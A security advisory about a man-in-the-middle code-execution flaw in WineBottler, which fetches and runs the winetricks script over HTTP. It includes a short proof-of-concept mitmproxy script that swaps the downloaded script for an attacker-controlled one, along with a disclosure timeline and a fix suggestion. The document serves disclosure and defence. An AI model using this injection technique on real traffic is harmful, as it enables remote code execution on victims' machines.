WineBottler 1.8-rc4 Man-In-The-Middle / Code Execution

2016-10-19 / 2016-10-20
Risk: Medium
Local: No
Remote: Yes

Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles Metadata =================================================== Release Date: 17-10-2016 Author: Florian Bogner // Kapsch BusinessCom AG ( Affected product: WineBottler ( Affected versions: up to the still current version 1.8-rc4 Tested on: OS X El Capitan 10.11.6 CVE : product not covered URL: Video: Vulnerability Status: No patch available - Developer became unresponsive after promising to fix the issue Product Description =================================================== WineBottler packages Windows-based programs like browsers, media-players, games or business applications snugly into Mac app-bundles. Vulnerability Description =================================================== Whenever WineBottler is launched it tries to update the bundled winetricks ( library. However, as this update is carried out over unencrypted HTTP an attacker with man-in-the-middle capabilities can replace the downloaded shell script. As the script is also launched immediately after downloading, this is a reliable man in the middle remote code execution vulnerability. The issue also affects all the bundles created with WineBottler. However, I think it can only be abused on their first launch. This greatly limits the attack surfe. PoC =================================================== 1.) Setup an HTTP proxy like Burp ( 2.) Redirect all HTTP traffic to this proxy 3.) Launch WineBottler 4.) Modify the request to so that it returns a valid shell script. 5.) Remote code execution has been gained! The following mitmproxy ( script "" can be used to automate the attack: from mitmproxy.models import decoded NEWLINE = '\r\n' def response(context, flow): if flow.request.url == "" and flow.response.status_code == 301 and flow.request.method=="GET": flow.response.status_code=200 # overwrite 301 status code to 200 with decoded(flow.response): # automatically decode gzipped responses. flow.response.content = "" # replace original script to launch flow.response.content += '#!/bin/sh'+NEWLINE flow.response.content += '/usr/bin/open /Applications/' Disclosure Timeline =================================================== 29.5.2016: The issue has been discovered 30.5.2016: Tried to establish initial contact with the developer using Facebook 31.5.2016: Requested CVE number; Retried to contact developer using Facebook 1.6.2016: MITRE declined CVE: The product is not covered. 2.6.2016: Created this documentation; Sent to developer using mail 18.6.2016: Developer responded on Facebook 20.6.2016: Developer promised that Winetricks update will be switched to HTTPS. Agreed on the 29.7. for the public disclosure 25.7.2016: Tried to contact developer as no new version has been released a no success 29.7.2016: Initially agreed public disclosure date a rescheduled 31.7.2016: Tried again to contact developer a again no success. 13.8.2016: Tried a last time to get in touch with the developer a again no success 17.10.2016: Public disclosure altough unfixed: Developer unresponsive since several month Suggested Solution =================================================== All request should be carried out over encrypted communication channels like HTTPS. The author already mentioned ( that he is planing to do so in the future. Yet, right now there is no patch available. The only workaround would be to block outgoing (HTTP) connections - However, whenever I tried that WineBottler stalled... Florian Bogner | Security Solutions ICT Technology Solutions Telefon Mobil +43 664 628 5491 |<> Kapsch BusinessCom AG | Wienerbergstrasse 53 | 1120 Wien | Asterreich<> | Firmenbuch HG Wien FN 178368g | Firmensitz Wien <> <>[cid:image001.jpg@01D0CDEE.D0D64C00] <> <> The information contained in this e-mail message is privileged and confidential and is for the exclusive use of the addressee. The person who receives this message and who is not the addressee, one of his employees or an agent entitled to hand it over to the addressee, is informed that he may not use, disclose or reproduce the contents thereof, and is kindly asked to notify the sender and delete the e-mail immediately.

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020,


Back to Top